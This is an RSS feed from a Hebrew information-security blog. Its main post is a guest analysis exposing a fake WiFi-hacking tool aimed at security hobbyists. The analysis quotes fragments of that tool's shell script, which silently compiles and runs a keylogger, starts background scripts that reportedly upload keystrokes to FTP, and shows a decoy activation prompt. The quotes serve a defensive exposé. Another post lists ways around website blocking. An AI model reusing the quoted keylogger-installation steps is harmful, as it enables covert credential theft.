<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>&#8235;ZuLL, יומנו של האקר. &#187; כללי&#8236;</title>	<atom:link href="http://guym.co.il/category/general/feed/" rel="self" type="application/rss+xml" />
	<link>http://guym.co.il</link>
	<description>&#8235;גיא מזרחי כותב על אבטחת מידע, האקינג, גאדג&#039;טים ודברים מעניינים&#8236;</description>	<lastBuildDate>Sun, 29 Aug 2010 06:13:51 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>he</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>&#8235;הרצאה שלי במיקרוסופט על סייבר Warfare&#8236;</title>		<link>http://guym.co.il/warfare/?nucrss=1</link>
		<comments>http://guym.co.il/warfare/#comments</comments>
		<pubDate>Sun, 29 Aug 2010 06:13:51 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1575</guid>
		<description><![CDATA[&#8235;אוהד פלוטניק שמנהל במיקרוסופט את ה-Security User Group שאל אותי לפני כמה חודשים אם אוכל להרצות בנושא מעניין לקבוצה.
אחרי המון זמן שניסינו לתאם את זה, ההרצאה שלי תתקיים ביום רביעי הקרוב.
נושא ההרצאה:
סייבר WARFARE , סכנות ברמת מדינה, מערך הגנה ברמת המדינה.
יהיו שם טעימות מנושאים שונים כגון פשעי רשת, טרור קיברנטי וכן הנושא העיקרי &#8211; Cyber [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fwarfare&crtId=148&dt=1283503587">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אוהד פלוטניק שמנהל במיקרוסופט את ה-Security User Group שאל אותי לפני כמה חודשים אם אוכל להרצות בנושא מעניין לקבוצה.<br />
אחרי המון זמן שניסינו לתאם את זה, ההרצאה שלי תתקיים ביום רביעי הקרוב.<br />
נושא ההרצאה:<br />
סייבר WARFARE , סכנות ברמת מדינה, מערך הגנה ברמת המדינה.<br />
יהיו שם טעימות מנושאים שונים כגון פשעי רשת, טרור קיברנטי וכן הנושא העיקרי &#8211; Cyber Warfare.<br />
אתם מוזמנים.</p>
<p>ניתן להירשם פה:</p>
<p><a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032458904&amp;Culture=he-IL" target="_blank">https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032458904&amp;Culture=he-IL</a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fwarfare&crtId=148&dt=1283503587"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%94%D7%A8%D7%A6%D7%90%D7%94+%D7%A9%D7%9C%D7%99+%D7%91%D7%9E%D7%99%D7%A7%D7%A8%D7%95%D7%A1%D7%95%D7%A4%D7%98+%D7%A2%D7%9C+%D7%A1%D7%99%D7%99%D7%91%D7%A8+Warfare+http://bit.ly/d6LGEh" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/warfare/feed/</wfw:commentRss>
		<slash:comments>20</slash:comments>
		</item>
		<item>
		<title>&#8235;כשמוסד ממלכתי פותח תיבה ב-Gmail&#8236;</title>		<link>http://guym.co.il/gmail-for-gov-bad-idea/?nucrss=1</link>
		<comments>http://guym.co.il/gmail-for-gov-bad-idea/#comments</comments>
		<pubDate>Tue, 03 Aug 2010 05:07:46 +0000</pubDate>
		<dc:creator>&#8235;yovitz&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[gmail]]></category>
		<category><![CDATA[ממשלתי]]></category>
		<category><![CDATA[פרטיות]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1560</guid>
		<description><![CDATA[&#8235;לפני מס' ימים התפרסמה באתר הפירסומים הממשלתי www.pirsum.gov. המודעה הבאה :

ולעיתונות המודפסת נמסרה ההודעה הבאה :

נסיון Login לתיבה ב-gmail נתן את ההודעה הזאת:

מה שכמובן משאיר אותנו עם פתיחת התיבה על שמנו, וקבלת קורות חיים של מועמדים שכותבים :

וכמובן &#8211; דיסקרטיות זה חשוב.

ככל הנראה השימוש בתיבה של Gmail במקום בתיבה של תהיל&#34;ה (תשתית הממשלה לעידן האינטרנט) [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=yovitz&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fgmail-for-gov-bad-idea&crtId=148&dt=1283503587">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>לפני מס' ימים התפרסמה באתר הפירסומים הממשלתי www.pirsum.gov. המודעה הבאה :</p>
<p style="text-align: center"><a href="http://guym.co.il/wp-content/uploads/2010/08/אישיות-פוליטית-בכירה.gif"><img class="size-full wp-image-1561 aligncenter" src="http://guym.co.il/wp-content/uploads/2010/08/אישיות-פוליטית-בכירה.gif" alt="" width="393" height="246" /></a></p>
<p>ולעיתונות המודפסת נמסרה ההודעה הבאה :</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/08/itonot.jpg"><img class="alignnone size-full wp-image-1562" src="http://guym.co.il/wp-content/uploads/2010/08/itonot.jpg" alt="" width="305" height="299" /></a></p>
<p>נסיון Login לתיבה ב-gmail נתן את ההודעה הזאת:</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/08/google-accounts.jpg"><img class="alignnone size-full wp-image-1563" src="http://guym.co.il/wp-content/uploads/2010/08/google-accounts.jpg" alt="" width="552" height="133" /></a></p>
<p>מה שכמובן משאיר אותנו עם פתיחת התיבה על שמנו, וקבלת קורות חיים של מועמדים שכותבים :</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/08/gmail-tik.jpg"><img class="alignnone size-full wp-image-1564" src="http://guym.co.il/wp-content/uploads/2010/08/gmail-tik.jpg" alt="" width="848" height="403" /></a></p>
<p>וכמובן &#8211; דיסקרטיות זה חשוב.</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/08/diskreti.jpg"><img class="alignnone size-full wp-image-1565" src="http://guym.co.il/wp-content/uploads/2010/08/diskreti.jpg" alt="" width="323" height="172" /></a></p>
<p>ככל הנראה השימוש בתיבה של Gmail במקום בתיבה של תהיל&quot;ה (תשתית הממשלה לעידן האינטרנט) נועד כדי לא לחשוף מי האישיות הפוליטית הבכירה שמחפשת איש תקשורת עם ניסיון במשברים תקשורתיים.</p>
<p>מסקנות :</p>
<p>1.	כשמוסד ממלכתי רוצה להיות אנונימי שידאג לייצר תיבה בצורה אחראית. עדיף עם שם גנרי כמו  misra801@site.gov.il ואם זה יקר או מורכב בירוקרטית אפשר לנסות את tikshorett@lapam.gov.il  (לשכת הפירסום הממשלתי) אני מאמין שהם יסתדרו עם הגדרת  Forward, אבל אני לא בטוח שיסתדרו עם שיתוף פעולה חוצה משרדים ממשלתיים.</p>
<p>2.	אין, אבל באמת אין על Copy Paste בדברים האלה. למה לייצר שגיאה בשם התיבה?</p>
<p><span style="text-decoration: underline"><strong>תודה ליניב אוביץ על הפוסט.</strong></span></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=yovitz&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fgmail-for-gov-bad-idea&crtId=148&dt=1283503587"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9B%D7%A9%D7%9E%D7%95%D7%A1%D7%93+%D7%9E%D7%9E%D7%9C%D7%9B%D7%AA%D7%99+%D7%A4%D7%95%D7%AA%D7%97+%D7%AA%D7%99%D7%91%D7%94+%D7%91-Gmail+http://bit.ly/bxeIB0" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/gmail-for-gov-bad-idea/feed/</wfw:commentRss>
		<slash:comments>30</slash:comments>
		</item>
		<item>
		<title>&#8235;חסימת אתרי אינטרנט &#8211; האם זה אפשרי?&#8236;</title>		<link>http://guym.co.il/%d7%97%d7%a1%d7%99%d7%9e%d7%aa-%d7%90%d7%aa%d7%a8%d7%99-%d7%90%d7%99%d7%a0%d7%98%d7%a8%d7%a0%d7%98-%d7%94%d7%90%d7%9d-%d7%96%d7%94-%d7%90%d7%a4%d7%a9%d7%a8%d7%99/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%97%d7%a1%d7%99%d7%9e%d7%aa-%d7%90%d7%aa%d7%a8%d7%99-%d7%90%d7%99%d7%a0%d7%98%d7%a8%d7%a0%d7%98-%d7%94%d7%90%d7%9d-%d7%96%d7%94-%d7%90%d7%a4%d7%a9%d7%a8%d7%99/#comments</comments>
		<pubDate>Thu, 15 Jul 2010 05:59:27 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[tunnel]]></category>
		<category><![CDATA[משטרה]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1557</guid>
		<description><![CDATA[&#8235;קראתי את הכתבה הזו בדה-מרקר על כך שהמשטרה ביקשה מספקיות אינטרנט לחסום אתרי הימורים.
מעניין. אני יכול לחשוב על כמה אתרים נוספים שהיה כדאי שיציעו לחסום כגון אתרי פדופיליה, אתרי שינאה, אתרי סקס ועוד סוגים רבים של אתרים. (וברצינות, אני חושב שאסור לחסום שום דבר. ניטרליות.)
למה ניטפלו דווקא לאתרי הימורים? זאת שאלה נהדרת.
אם תשאלו אותי, כנראה [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2597%25d7%25a1%25d7%2599%25d7%259e%25d7%25aa-%25d7%2590%25d7%25aa%25d7%25a8%25d7%2599-%25d7%2590%25d7%2599%25d7%25a0%25d7%2598%25d7%25a8%25d7%25a0%25d7%2598-%25d7%2594%25d7%2590%25d7%259d-%25d7%2596%25d7%2594-%25d7%2590%25d7%25a4%25d7%25a9%25d7%25a8%25d7%2599&crtId=148&dt=1283503587">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>קראתי את הכתבה הזו בדה-מרקר על כך ש<a href="http://www.themarker.com/tmc/article.jhtml?ElementId=az20100714_5455411" target="_blank">המשטרה ביקשה מספקיות אינטרנט לחסום אתרי הימורים</a>.</p>
<p>מעניין. אני יכול לחשוב על כמה אתרים נוספים שהיה כדאי שיציעו לחסום כגון אתרי פדופיליה, אתרי שינאה, אתרי סקס ועוד סוגים רבים של אתרים. (וברצינות, אני חושב שאסור לחסום שום דבר. ניטרליות.)</p>
<p>למה ניטפלו דווקא לאתרי הימורים? זאת שאלה נהדרת.</p>
<p>אם תשאלו אותי, כנראה שהיגעו למסקנה שהאתרים האלה מזינים את עולם הפשע הפיסי והמוחשי (משפחות הפשע וכ&quot;ו).</p>
<p>אם זה באמת הדבר (ואני לא מרמז על כך כי פשוט אין לי מושג) אני יכול להבין את העובדה שהמשטרה תבקש לחסום אתרים כאלה. להבין. זה לא אומר שאני מסכים עם חסימה כזו בשום צורה.</p>
<p>אני חייב לציין שלדעתי יש כמה וכמה אתרים שהיו ראויים יותר להיחסם והזכרתי חלק מהם קודם כגון אתרי פדופיליה ושינאה וגם אותם הייתי מעדיף שלא יחסמו כי ניטרליות הרשת חשובה יותר.</p>
<p>הנקודה שמעניינת אותי היא השאלה האם באמת אפשר לחסום אתרים כאלה שמרוויחים כסף רב ויכולים להשקיע סכומים נכבדים כדי להמשיך להרוויח כסף.</p>
<h2>איך לעקוף חסימת אתרי הימורים? איך לעקוף חסימת אתרים?</h2>
<p>יש כמה וכמה פתרונות שיאפשרו למהמר הישראלי להמשיך להוציא את כספו.</p>
<p>פתרון קל וזול: תיעול התעבורה דרך רשת המאפשרת אנונמיות כגון <a href="http://www.torproject.org/" target="_blank">TOR</a>. מורידים דפדפן ייעודי ונגמר הסיפור של חסימת האתר כי כל התעבורה יוצאת ממקום אחר בעולם ולא מישראל. הבעיה העיקרית עם TOR היא איטיות.</p>
<p>פתרון קל וזמין: תיעול התעבורה בעזרת חיבור VPN אל חו&quot;ל. פתרון כגון <a href="http://hotspotshield.com/" target="_blank">Hotspot Shield</a> יאפשר לכם להמשיך להמר. יש הרבה פתרונות דומים שתוכלו למצוא ע&quot;י גיגול <a href="http://www.google.co.il/search?hl=iw&amp;rlz=1B3GGLL_en___IL382&amp;q=hotspot+VPN&amp;meta=&amp;aq=f&amp;aqi=&amp;aql=&amp;oq=&amp;gs_rfai=" target="_blank">hotspot VPN</a>.</p>
<p>הבעיה עם תיעול תעבורה כזה היא שמישהו יכול לראות את התעבורה שלכם &#8211; אותו ספק שירותים.</p>
<p>דרך חכמה יותר לצאת על העולם היא לרכוש שרת VPS שלכם (עלות של כ-10$ לחודש) ולהתקין עליו מוצר כגון OPENVPN. בצורה זו תוכלו להמשיך להינות מאינטרנט מוצפן ומתועל דרך חו&quot;ל אך בלי שמישהו יוכל להקליט בקלות את התעבורה שלכם. (ברור, ספק ה-VPS וספק האינטרנט עדיין יכולים לעשות זאת וגם שירותי הבטחון של המדינה ממנה רכשתם את השירות אבל הם פחות מאיימים מאשר ספק שירותים לא ידוע או מפעיל שרת TOR).</p>
<p>אני בטוח שאתתרי ההימורים יוכלו לספק די בקלות תוכנה שתיתן את האפשרות לעשות זאת בצורה אוטומטית ובהנחה שהם יהיו חכמים (והם יהיו. יש להם מספיק כסף ומוטיבציה) הם יוכלו די בקלות לעקוף את החסימה.</p>
<p>ההחלטה הזאת של המשטרה תעשה חודש של בעיה ואח&quot;כ יצירת הפתרון הזמין והקל ללקוח ייכנס בתור חלק מההוצאות של האתרים. זה לא יהיה אפשרי לחסום אותם.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2597%25d7%25a1%25d7%2599%25d7%259e%25d7%25aa-%25d7%2590%25d7%25aa%25d7%25a8%25d7%2599-%25d7%2590%25d7%2599%25d7%25a0%25d7%2598%25d7%25a8%25d7%25a0%25d7%2598-%25d7%2594%25d7%2590%25d7%259d-%25d7%2596%25d7%2594-%25d7%2590%25d7%25a4%25d7%25a9%25d7%25a8%25d7%2599&crtId=148&dt=1283503587"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%97%D7%A1%D7%99%D7%9E%D7%AA+%D7%90%D7%AA%D7%A8%D7%99+%D7%90%D7%99%D7%A0%D7%98%D7%A8%D7%A0%D7%98+%E2%80%93+%D7%94%D7%90%D7%9D+%D7%96%D7%94+%D7%90%D7%A4%D7%A9%D7%A8%D7%99%3F+http://bit.ly/cMP7eO" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%97%d7%a1%d7%99%d7%9e%d7%aa-%d7%90%d7%aa%d7%a8%d7%99-%d7%90%d7%99%d7%a0%d7%98%d7%a8%d7%a0%d7%98-%d7%94%d7%90%d7%9d-%d7%96%d7%94-%d7%90%d7%a4%d7%a9%d7%a8%d7%99/feed/</wfw:commentRss>
		<slash:comments>32</slash:comments>
		</item>
		<item>
		<title>&#8235;איך לנסות לרמות האקרים ולצאת טמבל &#8211; פוסט אורח של יפתח עמית&#8236;</title>		<link>http://guym.co.il/%d7%9c%d7%a0%d7%a1%d7%95%d7%aa-%d7%9c%d7%a8%d7%9e%d7%95%d7%aa-%d7%94%d7%90%d7%a7%d7%a8%d7%99%d7%9d-%d7%95%d7%9c%d7%a6%d7%90%d7%aa-%d7%98%d7%9e%d7%91%d7%9c/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%9c%d7%a0%d7%a1%d7%95%d7%aa-%d7%9c%d7%a8%d7%9e%d7%95%d7%aa-%d7%94%d7%90%d7%a7%d7%a8%d7%99%d7%9d-%d7%95%d7%9c%d7%a6%d7%90%d7%aa-%d7%98%d7%9e%d7%91%d7%9c/#comments</comments>
		<pubDate>Sun, 11 Jul 2010 04:17:02 +0000</pubDate>
		<dc:creator>&#8235;יפתח עמית&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1543</guid>
		<description><![CDATA[&#8235;הפוסט הזה הוא תרגום של פוסט שלי (http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/) שחשבתי שיכול להתאים לפרסום בבלוג של גיא מכיוון שקהל היעד שלו הוא בעיקר אנשים שמתעסקים בהאקינג, אבטחת מידע או איך-שלא-תקראו-לזה&#8230; מקווה שתהנו (ותסלחו לי על הניסוחים הכושלים – כאמור זה תרגום).
בשבוע שעבר יצא לי &#34;לשחק&#34; קצת עם כלים לבדיקת רמת ההגנה של רשתות אלחוטיות בעקבות בקשה של [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=iamit&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%259c%25d7%25a0%25d7%25a1%25d7%2595%25d7%25aa-%25d7%259c%25d7%25a8%25d7%259e%25d7%2595%25d7%25aa-%25d7%2594%25d7%2590%25d7%25a7%25d7%25a8%25d7%2599%25d7%259d-%25d7%2595%25d7%259c%25d7%25a6%25d7%2590%25d7%25aa-%25d7%2598%25d7%259e%25d7%2591%25d7%259c&crtId=148&dt=1283503587">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>הפוסט הזה הוא תרגום של פוסט שלי (<a href="http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/">http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/</a>) שחשבתי שיכול להתאים לפרסום בבלוג של גיא מכיוון שקהל היעד שלו הוא בעיקר אנשים שמתעסקים בהאקינג, אבטחת מידע או איך-שלא-תקראו-לזה&#8230; מקווה שתהנו (ותסלחו לי על הניסוחים הכושלים – כאמור זה תרגום).</p>
<p>בשבוע שעבר יצא לי &quot;לשחק&quot; קצת עם כלים לבדיקת רמת ההגנה של רשתות אלחוטיות בעקבות בקשה של לקוח &quot;להריץ כלים לא שגרתיים כמו שכולם מריצים&quot; (למרות הסלידה שלי מדרישות לכלים ספציפיים ו/או לספק רשימת מכולת של &quot;מה אתה הולך להריץ&quot;&#8230; נחש מה? לא משנה במה אני משתמש, אתה יכול להיות בטוח שבאיזשהו שלב אני הולך להפתיע אותך&#8230;).</p>
<p>במסגרת החיפוש, ובעזרתם המקרית של <a href="http://techcrunch.com/2010/07/05/employees-challenged-to-crack-facebook-security-succeed/">טק-קראנץ'</a>, הגעתי <a href="http://fadzilmahfodh.blogspot.com/2009/07/8-wpa-hack-without-using-dictionary.html">לאתר הזה</a> המתיימר להיות מוקדש לאבטחת רשתות אלחוטיות. אז אחרי שהתגברתי על הבחילה הקלה מהעיצוב המזעזע (וכן – מוזיקת רקע באתר זה כל כך 90'&#8230;) הורדתי את 4 הקבצים האמורים להוות את הכלי. איפה ההתלבטות בכלל כשה-FBI משתמש באותם כלים&#8230;</p>
<p style="text-align: right"><a href="http://guym.co.il/wp-content/uploads/2010/07/fbi.png"><img class="size-full wp-image-1544 aligncenter" src="http://guym.co.il/wp-content/uploads/2010/07/fbi.png" alt="" width="188" height="176" /></a></p>
<p>בדיקה מהירה – ויש לנו שלושה סקריפטים (לכאורה) וזיפ (איך מתרגמים tarball לעברית? כדורזפת? טארבול?). למה לכאורה? מכיוון שכשסקריפט שאמור להיות טקסטואלי מזוהה על ידי המערכת כקובץ ELF אתה יודע שמשהוא &quot;מסריח&quot; קורה כאן. וכך התחיל הסיפור שנתן לי להגיע לסוף השבוע מחוייך ומבודח (בד&quot;כ אני סתם מותש).</p>
<p>אז הנה סיכום &quot;מנהלים&quot; למה שקורה באתר של החבר שלנו שה-FBI משתמשים לכאורה בכלים שלו:</p>
<ol>
<li>הכלים שהוא מספק אינם כלי אבטחת מידע בכלל. בהתחלה עוד נתתי לו להנות מהספק – נו, עוד מישהו שארז כלים ידועים בסקריפט משלו לצרכי נוחות.אבל לא. אפילו <a href="http://theta44.org/karma/index.html">karma</a> לא היתה כלולה שם – למרות שהסקריפט הראשי נקרא כך, ולמעשה זו הפונקציונליות שהכלי אמור היה לספק.</li>
<li>מבט זריז בזיפ מראה שהוא מכיל בכלל keylogger <a href="http://code.google.com/p/logkeys/">שנגנב מכאן</a>.</li>
<li>כשהסקריפט הראשי מופעל, שני סקריפטים נוספים מופעלים ברקע – האחד מקמפל את ה-keylogger ומריץ אותו, והשני דואג להעלות את תעוד ההקלדות ל-FTP כדי שהמתקיף יוכל לעקוב אחריך.</li>
<li>במקביל, הסקריפט הראשי במסגרת &quot;ההתקנה&quot; דורש ממך לשלוח אימייל לכותב הכלי על מנת לקבל קוד אקטיבציה, ובאופן מאד נוח פותח עבורך את פיירפוקס (שועל-אש? שואש?) עם שלושה טאבים לגימייל, יאהו, והוטמייל. לטענת הסקריפט לאחר שליחת האימייל אתה אמור לקבל קוד אקטיבציה חינם אוטומטית.</li>
</ol>
<p>נחזור ל&quot;כלים&quot; שלנו. כאמור הסקריפטים הם לא סקריפטים. מה נהיה? פשוט – הם היו פעם סקריפטים, אבל כדי לטשטש את מה שבאמת נעשה, הם &quot;קומפלו&quot; לקבצים בינריים באמצעות <a href="http://www.unixref.com/manPages/shc.html">shc</a>. המרת הקבצים הבינריים חזרה לסקריפטים היתה פשוטה למדי (שעורי בית -–לקרוא את התעוד של shc ולשחק עם הקבצים בבית).</p>
<p>עכשיו כשקצת יותר ברור מול מה אנחנו עומדים, בואו נסתכל על חלק מהקוד של הסקריפטים ומה עומד מאחוריהם. אפילו אם אתם לא סקריפטולוגים מהוללים, די קל לעקוב אחרי הנעשה (ויש אפילו הערות בקוד!!!).</p>
<div dir="ltr"># START BACKGROUND PROGRAMS BG1(RUN LINUX KEYLOGGER) AND BG2(RUN MONITORING KEYSTROKES AND SEND LOG.TXT FILES TO DRIVEHQ)<br />
cd lkl2<br />
./configure –silent<br />
make –silent<br />
make install –silent<br />
cd<br />
chmod +x /root/bg1.sh<br />
nohup /root/bg1.sh &amp;<br />
rm -r /root/nohup.out<br />
chmod +x /root/bg2.sh<br />
nohup /root/bg2.sh &amp;<br />
sleep 2<br />
rm -r /root/nohup.out<br />
clear</div>
<p>אוקיי, אז אנחנו רואים איך ה-keylogger מקומפל ומותקן, ושני הסקריפטים הנוספים bg1.sh ו-bg2.sh מורצים ברקע. בשלב הבא, אנו מגיעים ל&quot;התקנה&quot; בה הסקריפט הראשי (כאמור karma.sh) מבקש מהמשתמש לשלוח אימייל לצרכי אקטיבציה המכיל הצהרה כי השימוש בכלי איננו משמש לעבירה על החוק.</p>
<div dir="ltr">
<p># MENU LIST</p>
<p>echo “”</p>
<p>echo “——————————————————— “</p>
<p>echo “THIS MESSAGES WILL NOT APPEAR AFTER karma.sh IS ACTIVATED “</p>
<p>echo “——————————————————— “</p>
<p>echo “”</p>
<p>echo “1. Compose indemnity text below and send to fadzilmahfodh@gmail.com”</p>
<p>echo “ Yes, I want activation code and will never use for illegal purpose”</p>
<p>echo “”</p>
<p>echo “2. Check your email for activation code after sending text “</p>
<p>echo “”</p>
<p>read -p “3. Send now ? (0=no, 1=yes) “ act</p>
<p>clear</p>
</div>
<p>הזכרתי כי ההתקפה כאן מכוונת לאנשים שמתעסקים באבטחת מידע והאקינג, והנה הוכחה נוספת:</p>
<p dir="ltr">read -p “Which backtrack are you using ? (bt3=3,bt4=4) ” bt</p>
<p>נחמד&#8230; מוודאים איתנו באיזה גירסה של BackTrack אנחנו משתמשים. לזכות כותב הסקריפט ייאמר שאכן ההתנהגות של הסקריפט משתנה בהתאם לגירסת מ&quot;ה עליה אנחנו רצים (שינויי קונפיגורצית רשת וכו').</p>
<p>בשלב הבא מוודאים שהדפדפן סגור, ופותחים עבורנו את שלושת אתרי הוובמייל:</p>
<p dir="ltr">firefox https://login.yahoo.com/ &amp;<br />
sleep 4</p>
<p dir="ltr">firefox https://www.google.com/accounts/ManageAccount &amp;</p>
<p dir="ltr">sleep 4</p>
<p dir="ltr">firefox http://home.live.com/</p>
<p>המתקיף רוצה כמובן שנבצע כניסה מלאה לאימייל שלנו (עם ניחוש לא רע המכסה את ספקי האימייל העיקריים), כדי שנשלח את הבקשה לקוד האקטיבציה – וכל זאת כאמור כאשר ה-keylogger עובד במרץ ברקע ומקליט כל הקלדה שלנו ושולח אותה ל-FTP. בדיוק כאן רוב המשתמשים ייפלו&#8230;</p>
<p>השלב הבא בסקריפט – האקטיבציה עצמה. או שלא.</p>
<p dir="ltr">############################</p>
<p dir="ltr"># DECOY FOR ACTIVATION CODE</p>
<p dir="ltr">clear</p>
<p dir="ltr">echo “”</p>
<p dir="ltr">read -p “ENTER ROGUE AP ACTIVATION CODE : ” pls</p>
<p dir="ltr">sleep 3</p>
<p dir="ltr">echo “You have entered an invalid code ”</p>
<p dir="ltr">echo “”</p>
<p dir="ltr">exit</p>
<p dir="ltr">############################</p>
<p>יש להודות כי ההערות בגוף הסקריפט משעשעות – &quot;פתיון&quot; האקטיבציה די ברור כאן, ובמיוחד אהבתי את ההמתנה של שלוש השניות לפני שהמשתמש מיודע כי הקוד לא נכון. אפשר ממש להרגיש שהכלי עובד קשה כדי לוודא אותו ברקע. קלאסי!</p>
<p>זה פחות או יותר לשלב הניתוח הטכני של הקבצים המוצעים מהאתר. אבל לא הייתי טורח לכתוב את הפוסט הזה (ולתרגם אותו – שבינתיים לוקח לי יותר זמן מכתיבת הפוסט המקורי ), אלמלא הייתי נתקל בידידינו ההאקר המפורסם בצ'אט. אז האינטראקציה התחילה כשכתבתי אימייל על מנת לראות כיצד האקטיבציה קורה, ולאחר כיום קיבלתי תשובה (ממש &quot;מענה אוטומטי&quot;&#8230;):</p>
<p dir="ltr">Hi</p>
<p dir="ltr">1. We are preparing the activation code for you.</p>
<p dir="ltr">2. To make worth our while, could you consider a small donation (suggest euro 11) to support the website via Paypal a/c fadzilmahfodh@yahoo.com ?</p>
<p dir="ltr">Cheers.</p>
<p dir="ltr">EMAIL VIA MY CELLPHONE FOR FAST RESPONSE</p>
<p dir="ltr">http://fadzilmahfodh.blogspot.com</p>
<p>אז לא רק שלא קיבלתי קוד אקטיבציה, הם &quot;מכינים&quot; אותו (מה זה אומר? הלכו לקטוף צמחים מיוחדים לקוד שלי?), אלא שאני מתבקש לתרום מעשר קל למסכן שעבד כל כך קשה על כתיבת כלי אבטחה משהו משהו ומעניק אותו בחינם לקהילה&#8230; אוקיי, אז עניתי בנימוס ש:</p>
<p>1.	תודה – אני מחכה בכליון עיניים לקוד.</p>
<p>2.	אני אשקול תרומה אולי אחרי שאנסה את הכלי.</p>
<p>ובמהרה קיבלתי מענה המציע לי לנסות כלי אחר (שבכלל לא קשור למה שהכלי המקורי אמור לעשות) בגרסת נסיון.</p>
<p>המממ, מעניין. למזלי השתמשתי בחשבון ספאמי של יאהו וכנראה שגם ידידינו&#8230; מי שלא מכיר, ביאהו אפשר לראות את הסטטוס של מי שאתה מתכתב אתו באימייל ולצ'וטט איתו דרך ממשק הווב אם הוא כרגע זמין! אז זה בדיוק מה שעשיתי&#8230;</p>
<p dir="ltr">—– Our chat on Wed, 7/7/10 2:53 PM —–</p>
<p dir="ltr">Iftach(2:34 PM):  hey man</p>
<p dir="ltr">Iftach(2:34 PM):  mind if a ask a couple of questions?</p>
<p dir="ltr">fadzilmahfodh(2:34 PM):  okey</p>
<p dir="ltr">Iftach(2:35 PM):  cool. I’m doing this research on security tools and their authors…</p>
<p dir="ltr">fadzilmahfodh(2:35 PM):  okey</p>
<p dir="ltr">Iftach(2:35 PM):  saw your tool and wanted to hear about how you got to write</p>
<p dir="ltr">it, how well is it distributed in the community etc…</p>
<p dir="ltr">Iftach(2:36 PM):  does that activation thing a common practice with free tools?</p>
<p dir="ltr">fadzilmahfodh(2:36 PM):  yes see, we need to maintain our website thus we need supporter</p>
<p dir="ltr">fadzilmahfodh(2:37 PM):  everyday there are at least 500++ people asking for code</p>
<p dir="ltr">Iftach(2:37 PM):  I see.</p>
<p dir="ltr">fadzilmahfodh(2:37 PM):  i no longer able to provide for free</p>
<p dir="ltr">fadzilmahfodh(2:37 PM):  too time consuming and i need to be compensated for my</p>
<p dir="ltr">time and effort</p>
<p dir="ltr">fadzilmahfodh(2:38 PM):  hope you understand</p>
